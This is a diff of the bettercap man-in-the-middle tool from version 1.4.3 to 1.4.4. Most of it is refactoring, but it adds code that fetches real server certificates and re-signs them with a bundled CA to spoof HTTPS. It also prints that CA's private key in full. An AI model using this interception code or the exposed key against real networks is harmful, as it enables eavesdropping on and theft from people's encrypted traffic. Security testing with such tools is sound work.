bettercap 1.4.3 → 1.4.4

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 004df8ac9f02a6075dffa69038fb4b8fd02b8e8b
-  data.tar.gz: 720d7f1c5bcc08ad97eb917291d9a8c8463cc892
+  metadata.gz: b09b6f89c9024dc03bf63ddb24f8ad26456b1908
+  data.tar.gz: d146f66dec58665f9105006e95578f713602f7bd
 SHA512:
-  metadata.gz: c9a2e1722001bef5dbe99bc80e7c87b1ebfb3f2d93e85de449d272525332f04e098ad92d530b1b2e263da6e32a095c5044bb51bf543b6465e494da5b7dd249cd
-  data.tar.gz: eb475421115056754c756550a5379970532fc2b018a321a50bd1a3fdec16929f7cef71393ea37c722df4574ca68eec4f1a62cfc77a369b13ff6395c6bf7f9891
+  metadata.gz: c95f936850a53d62bb97c0a02ab97db7e5ca79ef03659f623a07bca4320ffa6202ab4369c3f9de34dd7495ed85878de22f13de335ce4d742582f34974a721e6c
+  data.tar.gz: d3c9765216d535380dfb0693b32755148d755af129fa3fcd2adb0cae020b79d112c30a11c4b24e26af9de2b56166756c454cdb500e7d59532bb184256f6c1962

data/lib/bettercap.rb

@@ -17,12 +17,25 @@
 Encoding.default_external = Encoding::UTF_8
 Encoding.default_internal = Encoding::UTF_8
 
-require 'optparse'
+require 'base64'
 require 'colorize'
+require 'digest'
+require 'ipaddr'
+require 'json'
+require 'net/dns'
+require 'net/http'
+require 'openssl'
+require 'optparse'
 require 'packetfu'
 require 'pcaprub'
-require 'ipaddr'
+require 'resolv'
+require 'rubydns'
+require 'socket'
+require 'stringio'
+require 'thread'
 require 'uri'
+require 'webrick'
+require 'zlib'
 
 Object.send :remove_const, :Config rescue nil
 Config = RbConfig

data/lib/bettercap/context.rb

@@ -11,8 +11,6 @@ This project is released under the GPL 3 license.
 
 =end
 
-require 'bettercap/error'
-
 module BetterCap
 # This class holds global states and data, moreover it exposes high level
 # methods to manipulate the program behaviour.
@@ -37,9 +35,9 @@ class Context
   attr_accessor :httpd
   # Instance of BetterCap::Network::Servers::DNSD class.
   attr_accessor :dnsd
-  # Instance of OpenSSL::X509::Certificate class used
+  # Instance of Proxy::SSL::Authority class used
   # for the HTTPS transparent proxy.
-  attr_accessor :certificate
+  attr_accessor :authority
   # Set to true if the program is running, to false if a shutdown was
   # scheduled by the user which pressed CTRL+C
   attr_accessor :running
@@ -77,7 +75,7 @@ class Context
     @spoofer         = nil
     @httpd           = nil
     @dnsd            = nil
-    @certificate     = nil
+    @authority       = nil
     @proxies         = []
     @redirections    = []
     @discovery       = Discovery::Thread.new self
@@ -139,7 +137,7 @@ class Context
     end
 
     # Start proxies and setup port redirection.
-    if @options.proxy
+    if @options.proxy or @options.proxy_https
       if @options.has_http_sniffer_enabled?
         BetterCap::Logger.warn "WARNING: Both HTTP transparent proxy and URL parser are enabled, you're gonna see duplicated logs."
       end
@@ -248,19 +246,13 @@ class Context
     end
 
     # create HTTP proxy
-    @proxies << Proxy::Proxy.new( @ifconfig[:ip_saddr], @options.proxy_port, false, @proxy_processor )
+    if @options.proxy
+      @proxies << Proxy::Proxy.new( @ifconfig[:ip_saddr], @options.proxy_port, false, @proxy_processor )
+    end
+
     # create HTTPS proxy
     if @options.proxy_https
-      # We're not acting as a normal HTTPS proxy, thus we're not
-      # able to handle CONNECT requests, thus we don't know the
-      # hostname the client is going to connect to.
-      # We can only use a self signed certificate.
-      if @options.proxy_pem_file.nil?
-        @certificate = Proxy::CertStore.get_selfsigned
-      else
-        @certificate = Proxy::CertStore.from_file @options.proxy_pem_file
-      end
-
+      @authority = Proxy::SSL::Authority.new( @options.proxy_pem_file )
       @proxies << Proxy::Proxy.new( @ifconfig[:ip_saddr], @options.proxy_https_port, true, @proxy_processor )
     end
 

data/lib/bettercap/firewalls/linux.rb

@@ -10,8 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/firewalls/base'
-require 'bettercap/shell'
 
 module BetterCap
 module Firewalls

data/lib/bettercap/firewalls/osx.rb

@@ -10,8 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/firewalls/base'
-require 'bettercap/shell'
 
 module BetterCap
 module Firewalls

data/lib/bettercap/loader.rb

@@ -1,12 +1,15 @@
 # encoding: UTF-8
 =begin
+
 BETTERCAP
+
 Author : Simone 'evilsocket' Margaritelli
 Email  : evilsocket@gmail.com
 Blog   : http://www.evilsocket.net/
+
 This project is released under the GPL 3 license.
+
 =end
-require 'bettercap/error'
 
 module BetterCap
 # This class is responsible for dynamically loading modules.

data/lib/bettercap/monkey/openssl/server.rb

@@ -0,0 +1,35 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+# Add accept_nonblock method to OpenSSL::SSL::SSLServer
+module OpenSSL
+  module SSL
+    class SSLServer
+      unless public_method_defined? :accept_nonblock
+        def accept_nonblock
+          sock = @svr.accept_nonblock
+
+          begin
+            ssl = OpenSSL::SSL::SSLSocket.new(sock, @ctx)
+            ssl.sync_close = true
+            ssl.accept if @start_immediately
+            ssl
+          rescue SSLError => ex
+            sock.close
+            raise ex
+          end
+        end
+      end
+    end
+  end
+end

data/lib/bettercap/monkey/packetfu/utils.rb

@@ -16,8 +16,6 @@ This project is released under the GPL 3 license.
 # regular expression.
 #
 # ORIGINAL: https://github.com/packetfu/packetfu/blob/master/lib/packetfu/utils.rb#L204
-require 'bettercap/logger'
-
 module PacketFu
   class Packet
     def eth2s(which = :src)
@@ -29,7 +27,7 @@ module PacketFu
       end
     end
   end
-  
+
   class Utils
     def self.ifconfig(iface='eth0')
       ret = {}

data/lib/bettercap/monkey/system.rb

@@ -0,0 +1,25 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+# http://stackoverflow.com/questions/891537/detect-number-of-cpus-installed
+module System
+  extend self
+  def cpu_count
+    return Java::Java.lang.Runtime.getRuntime.availableProcessors if defined? Java::Java
+    return File.read('/proc/cpuinfo').scan(/^processor\s*:/).size if File.exist? '/proc/cpuinfo'
+    require 'win32ole'
+    WIN32OLE.connect("winmgmts://").ExecQuery("select * from Win32_ComputerSystem").NumberOfProcessors
+  rescue LoadError
+    Integer `sysctl -n hw.ncpu 2>/dev/null` rescue 4
+  end
+end

data/lib/bettercap/network/arp_reader.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/error'
 
 module BetterCap
 module Network

data/lib/bettercap/network/network.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'thread'
 
 module BetterCap
 # Handles various network related tasks.

data/lib/bettercap/network/packet_queue.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/error'
 
 module BetterCap
 module Network

data/lib/bettercap/network/servers/dnsd.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'rubydns'
 
 module BetterCap
 module Network

data/lib/bettercap/network/servers/httpd.rb

@@ -10,9 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'webrick'
-
-require 'bettercap/logger'
 
 module BetterCap
 module Network

data/lib/bettercap/network/target.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'socket'
 
 module BetterCap
 module Network

data/lib/bettercap/options.rb

@@ -175,11 +175,11 @@ class Options
         ctx.options.gateway = v
       end
 
-      opts.on( '-I', '--interface IFACE', 'Network interface name - default: ' + ctx.options.iface.to_s ) do |v|
+      opts.on( '-I', '--interface IFACE', 'Network interface name - default: ' + ctx.options.iface.to_s.yellow ) do |v|
         ctx.options.iface = v
       end
 
-      opts.on( '-S', '--spoofer NAME', 'Spoofer module to use, available: ' + Spoofers::Base.available.join(', ') + ' - default: ' + ctx.options.spoofer ) do |v|
+      opts.on( '-S', '--spoofer NAME', "Spoofer module to use, available: #{Spoofers::Base.available.map{|x| x.yellow }.join(', ')} - default: #{ctx.options.spoofer.yellow}." ) do |v|
         ctx.options.spoofer = v
       end
 
@@ -203,7 +203,7 @@ class Options
         ctx.options.debug = true
       end
 
-      opts.on( '-L', '--local', 'Parse packets coming from/to the address of this computer ( NOTE: Will set -X to true ), default to false.' ) do
+      opts.on( '-L', '--local', "Parse packets coming from/to the address of this computer ( NOTE: Will set -X to true ), default to #{'false'.yellow}." ) do
         ctx.options.local = true
         ctx.options.sniffer = true
       end
@@ -227,7 +227,7 @@ class Options
         ctx.options.sniffer_filter = v
       end
 
-      opts.on( '-P', '--parsers PARSERS', 'Comma separated list of packet parsers to enable, "*" for all ( NOTE: Will set -X to true ), available: ' + Parsers::Base.available.join(', ') + ' - default: *' ) do |v|
+      opts.on( '-P', '--parsers PARSERS', "Comma separated list of packet parsers to enable, '*' for all ( NOTE: Will set -X to true ), available: #{Parsers::Base.available.map { |x| x.yellow }.join(', ')} - default: #{'*'.yellow}" ) do |v|
         ctx.options.sniffer = true
         ctx.options.parsers = Parsers::Base.from_cmdline(v)
       end
@@ -238,15 +238,15 @@ class Options
         ctx.options.custom_parser = Regexp.new(v)
       end
 
-      opts.on( '--silent', 'Suppress every message which is not an error or a warning, default to false.' ) do
+      opts.on( '--silent', "Suppress every message which is not an error or a warning, default to #{'false'.yellow}." ) do
         ctx.options.silent = true
       end
 
-      opts.on( '--no-discovery', 'Do not actively search for hosts, just use the current ARP cache, default to false.' ) do
+      opts.on( '--no-discovery', "Do not actively search for hosts, just use the current ARP cache, default to #{'false'.yellow}." ) do
         ctx.options.arpcache = true
       end
 
-      opts.on( '--no-spoofing', 'Disable spoofing, alias for --spoofer NONE.' ) do
+      opts.on( '--no-spoofing', "Disable spoofing, alias for #{'--spoofer NONE'.yellow}." ) do
         ctx.options.spoofer = 'NONE'
       end
 
@@ -258,41 +258,38 @@ class Options
         ctx.options.half_duplex = true
       end
 
-      opts.on( '--proxy', 'Enable HTTP proxy and redirects all HTTP requests to it, default to false.' ) do
+      opts.on( '--proxy', "Enable HTTP proxy and redirects all HTTP requests to it, default to #{'false'.yellow}." ) do
         ctx.options.proxy = true
       end
 
-      opts.on( '--proxy-https', 'Enable HTTPS proxy and redirects all HTTPS requests to it, default to false.' ) do
-        ctx.options.proxy = true
+      opts.on( '--proxy-https', "Enable HTTPS proxy and redirects all HTTPS requests to it, default to #{'false'.yellow}." ) do
         ctx.options.proxy_https = true
       end
 
-      opts.on( '--proxy-port PORT', 'Set HTTP proxy port, default to ' + ctx.options.proxy_port.to_s + ' .' ) do |v|
+      opts.on( '--proxy-port PORT', "Set HTTP proxy port, default to #{ctx.options.proxy_port.to_s.yellow}." ) do |v|
         ctx.options.proxy = true
         ctx.options.proxy_port = v.to_i
       end
 
-      opts.on( '--http-ports PORT1,PORT2', 'Comma separated list of HTTP ports to redirect to the proxy, default to ' + ctx.options.http_ports.join(', ') + ' .' ) do |v|
+      opts.on( '--http-ports PORT1,PORT2', "Comma separated list of HTTP ports to redirect to the proxy, default to #{ctx.options.http_ports.map{|x| x.to_s.yellow }.join(', ')}." ) do |v|
         ctx.options.http_ports = ctx.options.parse_ports( v )
       end
 
-      opts.on( '--https-ports PORT1,PORT2', 'Comma separated list of HTTPS ports to redirect to the proxy, default to ' + ctx.options.https_ports.join(', ') + ' .' ) do |v|
+      opts.on( '--https-ports PORT1,PORT2', "Comma separated list of HTTPS ports to redirect to the proxy, default to #{ctx.options.https_ports.map{|x| x.to_s.yellow }.join(', ')}." ) do |v|
         ctx.options.https_ports = ctx.options.parse_ports( v )
       end
 
-      opts.on( '--proxy-https-port PORT', 'Set HTTPS proxy port, default to ' + ctx.options.proxy_https_port.to_s + ' .' ) do |v|
-        ctx.options.proxy = true
+      opts.on( '--proxy-https-port PORT', "Set HTTPS proxy port, default to #{ctx.options.proxy_https_port.to_s.yellow}." ) do |v|
         ctx.options.proxy_https = true
         ctx.options.proxy_https_port = v.to_i
       end
 
-      opts.on( '--proxy-pem FILE', 'Use a custom PEM certificate file for the HTTPS proxy.' ) do |v|
-        ctx.options.proxy = true
+      opts.on( '--proxy-pem FILE', "Use a custom PEM CA certificate file for the HTTPS proxy, default to #{Proxy::SSL::Authority::DEFAULT.yellow} ." ) do |v|
         ctx.options.proxy_https = true
         ctx.options.proxy_pem_file = File.expand_path v
       end
 
-      opts.on( '--proxy-module MODULE', 'Ruby proxy module to load, either a custom file or one of the following: ' + Proxy::Module.available.join(', ') + ' .' ) do |v|
+      opts.on( '--proxy-module MODULE', "Ruby proxy module to load, either a custom file or one of the following: #{Proxy::Module.available.map{|x| x.yellow}.join(', ')}." ) do |v|
         Proxy::Module.load(ctx, opts, v)
       end
 
@@ -300,7 +297,7 @@ class Options
         ctx.options.parse_custom_proxy!(v)
       end
 
-      opts.on( '--custom-proxy-port PORT', 'Specify a port for the custom HTTP upstream proxy, default to ' + ctx.options.custom_proxy_port.to_s + ' .' ) do |v|
+      opts.on( '--custom-proxy-port PORT', "Specify a port for the custom HTTP upstream proxy, default to #{ctx.options.custom_proxy_port.to_s.yellow}." ) do |v|
         ctx.options.custom_proxy_port = v.to_i
       end
 
@@ -312,19 +309,19 @@ class Options
         ctx.options.parse_custom_proxy!( v, true )
       end
 
-      opts.on( '--custom-https-proxy-port PORT', 'Specify a port for the custom HTTPS upstream proxy, default to ' + ctx.options.custom_https_proxy_port.to_s + ' .' ) do |v|
+      opts.on( '--custom-https-proxy-port PORT', "Specify a port for the custom HTTPS upstream proxy, default to #{ctx.options.custom_https_proxy_port.to_s.yellow}." ) do |v|
         ctx.options.custom_https_proxy_port = v.to_i
       end
 
-      opts.on( '--custom-redirection RULE', 'Apply a custom port redirection, the format of the rule is "PROTOCOL ORIGINAL_PORT NEW_PORT". For instance "TCP 21 2100" will redirect all TCP traffic going to port 21, to port 2100.' ) do |v|
+      opts.on( '--custom-redirection RULE', "Apply a custom port redirection, the format of the rule is #{'PROTOCOL ORIGINAL_PORT NEW_PORT'.yellow}. For instance #{'TCP 21 2100'.yellow} will redirect all TCP traffic going to port 21, to port 2100." ) do |v|
         ctx.options.parse_redirection!( v )
       end
 
-      opts.on( '--httpd', 'Enable HTTP server, default to false.' ) do
+      opts.on( '--httpd', "Enable HTTP server, default to #{'false'.yellow}." ) do
         ctx.options.httpd = true
       end
 
-      opts.on( '--httpd-port PORT', 'Set HTTP server port, default to ' + ctx.options.httpd_port.to_s +  '.' ) do |v|
+      opts.on( '--httpd-port PORT', "Set HTTP server port, default to #{ctx.options.httpd_port.to_s.yellow}." ) do |v|
         ctx.options.httpd = true
         ctx.options.httpd_port = v.to_i
       end
@@ -334,11 +331,11 @@ class Options
         ctx.options.dnsd_file = File.expand_path v
       end
 
-      opts.on( '--dns-port PORT', 'Set DNS server port, default to ' + ctx.options.dnsd_port.to_s +  '.' ) do |v|
+      opts.on( '--dns-port PORT', "Set DNS server port, default to #{ctx.options.dnsd_port.to_s.yellow}." ) do |v|
         ctx.options.dnsd_port = v.to_i
       end
 
-      opts.on( '--httpd-path PATH', 'Set HTTP server path, default to ' + ctx.options.httpd_path +  '.' ) do |v|
+      opts.on( '--httpd-path PATH', "Set HTTP server path, default to #{ctx.options.httpd_path.yellow} ." ) do |v|
         ctx.options.httpd = true
         ctx.options.httpd_path = v
       end
@@ -380,6 +377,11 @@ class Options
                               "either use the --no-sslstrip option or remove the --dns option."
     end
 
+    if ctx.options.has_proxy_module? and ( !ctx.options.proxy and !ctx.options.proxy_https )
+      raise BetterCap::Error, "A proxy module was specified but none of the HTTP or HTTPS proxies are " \
+                              "enabled, specify --proxy or --proxy-https options."
+    end
+
     unless ctx.options.gateway.nil?
       raise BetterCap::Error, "The specified gateway '#{ctx.options.gateway}' is not a valid IPv4 address." unless Network::Validator.is_ip?(ctx.options.gateway)
       ctx.gateway = ctx.options.gateway

data/lib/bettercap/proxy/module.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/logger'
 
 module BetterCap
 module Proxy
@@ -40,8 +39,6 @@ class Module
 
   # Load the module with +name+.
   def self.load(ctx, opts, name)
-    ctx.options.proxy = true
-
     if self.is_builtin?(name)
       ctx.options.proxy_module = "#{@@path}/#{name}.rb"
     else

data/lib/bettercap/proxy/proxy.rb

@@ -11,9 +11,6 @@ This project is released under the GPL 3 license.
 
 =end
 
-require 'socket'
-require 'uri'
-
 module BetterCap
 module Proxy
 # Transparent proxy class.
@@ -28,13 +25,12 @@ class Proxy
     @is_https      = is_https
     @type          = is_https ? 'HTTPS' : 'HTTP'
     @upstream_port = is_https ? 443 : 80
-    @sslserver     = nil
-    @sslcontext    = nil
     @server        = nil
+    @sslserver     = nil
     @main_thread   = nil
     @running       = false
-    @streamer      = Streamer.new processor
     @local_ips     = []
+    @streamer      = Streamer.new( processor, need_sslstrip? )
 
     begin
       @local_ips = Socket.ip_address_list.collect { |x| x.ip_address }
@@ -46,7 +42,10 @@ class Proxy
 
     BasicSocket.do_not_reverse_lookup = true
 
-    @pool = ThreadPool.new( 4, 64 ) do |client|
+    tmin = System.cpu_count
+    tmax = tmin * 16
+
+    @pool = ThreadPool.new( tmin, tmax ) do |client|
       begin
        client_worker client
       rescue Exception => e
@@ -59,16 +58,13 @@ class Proxy
   # Start this proxy instance.
   def start
     begin
-      @server = @socket = TCPServer.new( @address, @port )
+      @socket = TCPServer.new( @address, @port )
 
       if @is_https
-        cert = Context.get.certificate
-
-        @sslcontext      = OpenSSL::SSL::SSLContext.new
-        @sslcontext.cert = cert[:cert]
-        @sslcontext.key  = cert[:key]
-
-        @server = @sslserver = OpenSSL::SSL::SSLServer.new( @socket, @sslcontext )
+        @sslserver = SSL::Server.new( @socket )
+        @server    = @sslserver.io
+      else
+        @server    = @socket
       end
 
       @main_thread = Thread.new &method(:server_thread)
@@ -100,13 +96,24 @@ class Proxy
     Logger.info "[#{@type.green}] Proxy starting on #{@address}:#{@port} ...\n"
 
     @running = true
+    sockets  = [ @server ]
 
     while @running do
       begin
-        @pool << @server.accept
+        IO.select(sockets).first.each do |sock|
+          begin
+            if io = sock.accept_nonblock
+              @pool << io
+            end
+          rescue SystemCallError
+            # nothing
+          rescue Errno::ECONNABORTED
+            # client closed the socket even before accept
+            io.close rescue nil
+          end
+        end
       rescue OpenSSL::SSL::SSLError => se
-        Logger.debug("Error while accepting #{@type} connection.")
-        Logger.exception(se)
+        Logger.debug("Error while accepting #{@type} connection ( #{se.message} ).")
       rescue Exception => e
         Logger.warn("Error while accepting #{@type} connection: #{e.inspect}") if @running
       end
@@ -162,6 +169,11 @@ class Proxy
 
     client.close
   end
+
+  # Return true if sslstrip is needed for this proxy instance.
+  def need_sslstrip?
+    ( Context.get.options.sslstrip and !@is_https )
+  end
 end
 
 end

data/lib/bettercap/proxy/ssl/authority.rb

@@ -0,0 +1,176 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module SSL
+
+# Simple wrapper class used to fetch a server HTTPS certificate.
+class Fetcher < Net::HTTP
+  # The server HTTPS certificate.
+  attr_accessor :certificate
+  # Overridden from Net::HTTP in order to save the peer certificate
+  # before the connection is closed.
+  def on_connect
+    @certificate = peer_cert
+  end
+  # Fetch the HTTPS certificate of +hostname+:+port+.
+  def self.fetch( hostname, port )
+    http             = self.new( hostname, port )
+    http.use_ssl     = true
+    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+
+    http.head("/")
+    http.certificate
+  end
+end
+
+# Used as an on-disk cache of server certificates.
+class Store
+  # The store path.
+  PATH = File.join( Dir.home, '.bettercap', 'certificates' )
+
+  # Create an instance of this class.
+  def initialize
+    unless File.directory?( Store::PATH )
+      Logger.info "[#{'SSL'.green}] Initializing certificates store '#{Store::PATH}' ..."
+      FileUtils.mkdir_p( Store::PATH )
+    end
+
+    @store = {}
+    @lock  = Mutex.new
+  end
+
+  # Find the +hostname+:+port+ certificate and return it.
+  def find( hostname, port )
+    key = Digest::SHA256.hexdigest( "#{hostname}_#{port}" )
+
+    @lock.synchronize {
+      unless @store.has_key?(key)
+        # Certificate not available in memory, search it in the store PATH.
+        filename = File.join( Store::PATH, key )
+        s_cert = load_from_file( filename )
+        # Not available on disk too, fetch it from the server and save it.
+        if s_cert.nil?
+          Logger.info "[#{'SSL'.green}] Fetching certificate from #{hostname}:#{port} ..."
+
+          s_cert = Fetcher.fetch( hostname, port )
+          save_to_file( s_cert, filename )
+        else
+          Logger.info "[#{'SSL'.green}] Loaded HTTPS certificate for '#{hostname}' from store."
+        end
+
+        @store[key] = s_cert
+      end
+    }
+
+    @store[key]
+  end
+
+  private
+
+  # Load and return a certificate from +filename+ if it exists, also check if
+  # the certificate is expired, in which case it will remove it and return nil.
+  def load_from_file( filename )
+    cert = nil
+    if File.exist?(filename)
+      data = File.read(filename)
+      cert = OpenSSL::X509::Certificate.new(data)
+      # Check if expired.
+      now = Time.now
+      if now < cert.not_before or now > cert.not_after
+        File.delete( filename )
+        cert = nil
+      end
+    end
+    cert
+  end
+
+  # Save the +cert+ certificate to +filename+ encoded as PEM.
+  def save_to_file( cert, filename )
+    File.open( filename, "w+" ) { |file| file.write(cert.to_pem) }
+  end
+end
+
+# This class represents bettercap's HTTPS CA.
+class Authority
+  # Default CA file.
+  DEFAULT = File.join( Dir.home, '.bettercap', 'bettercap-ca.pem' )
+
+  # CA certificate.
+  attr_reader :certificate
+  # CA key.
+  attr_reader :key
+
+  # Create an instance of this class loading the certificate and key from
+  # +filename+ which is expected to be a PEM formatted file.
+  # If +filename+ is nil, Authority::DEFAULT will be used instead.
+  def initialize( filename = nil )
+    install_ca
+    filename ||= Authority::DEFAULT
+
+    Logger.info "[#{'SSL'.green}] Loading HTTPS Certification Authority from '#{filename}' ..."
+
+    begin
+      pem = File.read(filename)
+
+      @certificate = OpenSSL::X509::Certificate.new(pem)
+      @key         = OpenSSL::PKey::RSA.new(pem)
+      @store       = Store.new
+      @cache       = {}
+      @lock        = Mutex.new
+    rescue Errno::ENOENT
+      raise BetterCap::Error, "'#{filename}' - No such file or directory."
+
+    rescue OpenSSL::X509::CertificateError
+      raise BetterCap::Error, "'#{filename}' - Missing or invalid certificate."
+
+    rescue OpenSSL::PKey::RSAError
+      raise BetterCap::Error, "'#{filename}' - Missing or invalid key."
+    end
+  end
+
+  # Fetch the certificate from +hostname+:+port+, sign it with our own CA and
+  # return it.
+  def spoof( hostname, port = 443 )
+    @lock.synchronize {
+      unless @cache.has_key?(hostname)
+        # 1. fetch real server certificate
+        s_cert = @store.find( hostname, port )
+        # 2. Sign it with our CA.
+        s_cert.public_key = @key.public_key
+        s_cert.issuer     = @certificate.subject
+        s_cert.sign( @key, OpenSSL::Digest::SHA256.new )
+        # 3. Profit ^_^
+        @cache[hostname] = s_cert
+      end
+    }
+    @cache[hostname]
+  end
+
+  def install_ca
+    unless File.exist?( Authority::DEFAULT )
+      root   = File.join( Dir.home, '.bettercap' )
+      source = File.dirname(__FILE__) + '/bettercap-ca.pem'
+
+      Logger.info "[#{'SSL'.green}] Installing CA to #{root} ..."
+
+      FileUtils.mkdir_p( root )
+      FileUtils.cp( source, root )
+    end
+  end
+end
+
+end
+end
+end

data/lib/bettercap/proxy/ssl/bettercap-ca.pem

@@ -0,0 +1,49 @@
+-----BEGIN PRIVATE KEY-----
+MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCaoeZj2x7hY4RV
+L4S6F6GfsEAye1/rTivXQCBsEMdBifPFCWz4i1s5v1CbxO4x4dfgtJiVniGyMsnQ
+pWOsZ/kjt74FIzgA2A7RTsz6+jvxFnw8uNH2UvHAlXerpghBw7F46HTKb7fPGlXI
+eMrXd7SQ9fonNM1fQ0L37+ILAaZIIXjm3bM7KWuM7+8qr2bxLxP9A1ud5ruOLNF+
+jxcCykm6ir/eo3M+4Yo9pOwsIvg9foOw7ahEVSB7nAZB9J2ohbCFfG7sFhKKgWFT
+xKBiEHny8qaD1/16FID/SZVXhFjjK2n8Gd87cIk104392H/MQVWui9rkocwszCov
+jFVOnlhjAgMBAAECggEAAM/Ivc1wpA45q5jMQY3OM2BhdeJf5oRKhp63jNmpshZf
+STF7ePKCUBNJAQhPl8NvtqY8Bs0FsEHD/Wxg0Y7aJ+3W+X/t01NPAJpBSS/3EJTl
+ogv2TiyxSCmAr033zSCR1eiidE2R0Wx59strhSYDtJ8V6Q7F5TIdL9/6d8RScx53
+xT/efogV3ebmXNhOOG6FrjQ5uCW7KZUXRaL3nozhEldFpzjak1XKVgKLv7OBaLwI
+tCgVGkfJpZbTYV2sht32JAwkEyTPtS8/49A4RRu5c62pLiDK5TkQGxtBLBpBTFoi
+f95LeqyApRDR5zTeP8uvHyK/Of5YBLJljkx+YDYugQKBgQDJN4KXOhV4DGVvriwA
+RBEd5nNJ/t/MATcGrFX4uqApdsMux9cpRaNa1hRxn2icm/whHrOFaBROAB7L6Zd4
+uLnrzpwFTq9YMH4AXe+sPphAtuk7ZULj1qkZ3yOjiKAJcJ4LWUxQ3H32KU6GIu+e
+x/e+B95pmk+s9XKajMSkKaMkWwKBgQDEu4fzhRyVvntq1s6D5R9du9eRV/6E5hLs
+gylMx8smzHQ46Ef5df5uEJUfkzyCJmOMGpKAW5czsLgKkx05Xw97xwn++/9lhHas
+E4SFArrIkAvBmiM44fZSKY3sVUWAHKYJy+Lg/7SR4cFVOxRyYhrFLjeXb9mOEdTo
+a6xmM3M6mQKBgDRpqDOaJqN5nyaDGOUM1eSS9a7tm//4xQuQ8mfyvOtwCxFxbqNK
+h22O3A5otogsvXUnGR4D6V4T+/GjrBf/DjbVP6DGSThQkVGpJlgYifI5cvFMxCqy
+7KNXk2HyobUzx4cvQIjDlm/7fH/GM+KJNggi5pVdY6mq2apWRpZ4Xg2HAoGBAJOs
+WQ6Yuq5Ev4uhFn+2+2Z23AeDz8+ejFHw2o2B46KKEiutYGmHAqdH10hOUzs26b5/
+K70iA0uPuXZmm6c3Df5Rl9VI/5sKZbIhLHZTaDWouspmk03df/KIsrnWAEd8Ob5c
+xz8xci+XEHKT2HNL5OBiIuSP1vRnujOEr3I/6JzxAoGBAJlu4gjm8StuL5ALy43a
+K62Nrsio/RhPjVUKXMtzTOgf2f2mRn04YibRNbB5Gzum4oWkjyue7qhBjIt/FX1Z
+kecFhr5JG4u/yyR6R2BMw4Jvh9kV6Y/GnDpSga8sK2P3QKFD01Qtw72x5xCj94CL
+kWqGcTRdiMAWQsRKvndzWAMc
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIDZzCCAk+gAwIBAgIJANKD84I3l13QMA0GCSqGSIb3DQEBCwUAMEoxCzAJBgNV
+BAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMRIwEAYDVQQKDAliZXR0ZXJjYXAx
+EjAQBgNVBAMMCWJldHRlcmNhcDAeFw0xNjAyMjMwMTAxNTlaFw0xNzAyMjIwMTAx
+NTlaMEoxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMRIwEAYDVQQK
+DAliZXR0ZXJjYXAxEjAQBgNVBAMMCWJldHRlcmNhcDCCASIwDQYJKoZIhvcNAQEB
+BQADggEPADCCAQoCggEBAJqh5mPbHuFjhFUvhLoXoZ+wQDJ7X+tOK9dAIGwQx0GJ
+88UJbPiLWzm/UJvE7jHh1+C0mJWeIbIyydClY6xn+SO3vgUjOADYDtFOzPr6O/EW
+fDy40fZS8cCVd6umCEHDsXjodMpvt88aVch4ytd3tJD1+ic0zV9DQvfv4gsBpkgh
+eObdszspa4zv7yqvZvEvE/0DW53mu44s0X6PFwLKSbqKv96jcz7hij2k7Cwi+D1+
+g7DtqERVIHucBkH0naiFsIV8buwWEoqBYVPEoGIQefLypoPX/XoUgP9JlVeEWOMr
+afwZ3ztwiTXTjf3Yf8xBVa6L2uShzCzMKi+MVU6eWGMCAwEAAaNQME4wHQYDVR0O
+BBYEFBspFbBsNWr57dZicWMDjOaRxQoPMB8GA1UdIwQYMBaAFBspFbBsNWr57dZi
+cWMDjOaRxQoPMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAJXGBH8H
+DKttB8KIbFzVRVcBQ5Wvw+3oFVlmnotQuxz17fGr2ZXEPiY8/P89MgAUqVkiaIS5
+EZOnIfPu7icGWvT0N3eoxnLaTdCFy0NOHXJh2+zrav5FWsULsmSxOBxItvkxq0fN
+yk1P/5kLmrJKnKUJKH7QDjNeEqJdfSx+dg2435a5pcvrVfjCGrd8F8CIED6sYd0n
+pibpJXi8TILiPrjNhTWT2Y5XflfV3Ho/+jIbeY3wzsApwsBINy0ticABdPhtEGHk
+nkR6dqDv1rSuzify5OdYeLy/UX4R/vv1BS0PLScE1lUB16ybzJ2imWJgOQs6J4E6
+hHakJaVPVAPFWUU=
+-----END CERTIFICATE-----

data/lib/bettercap/proxy/ssl/server.rb

@@ -0,0 +1,61 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
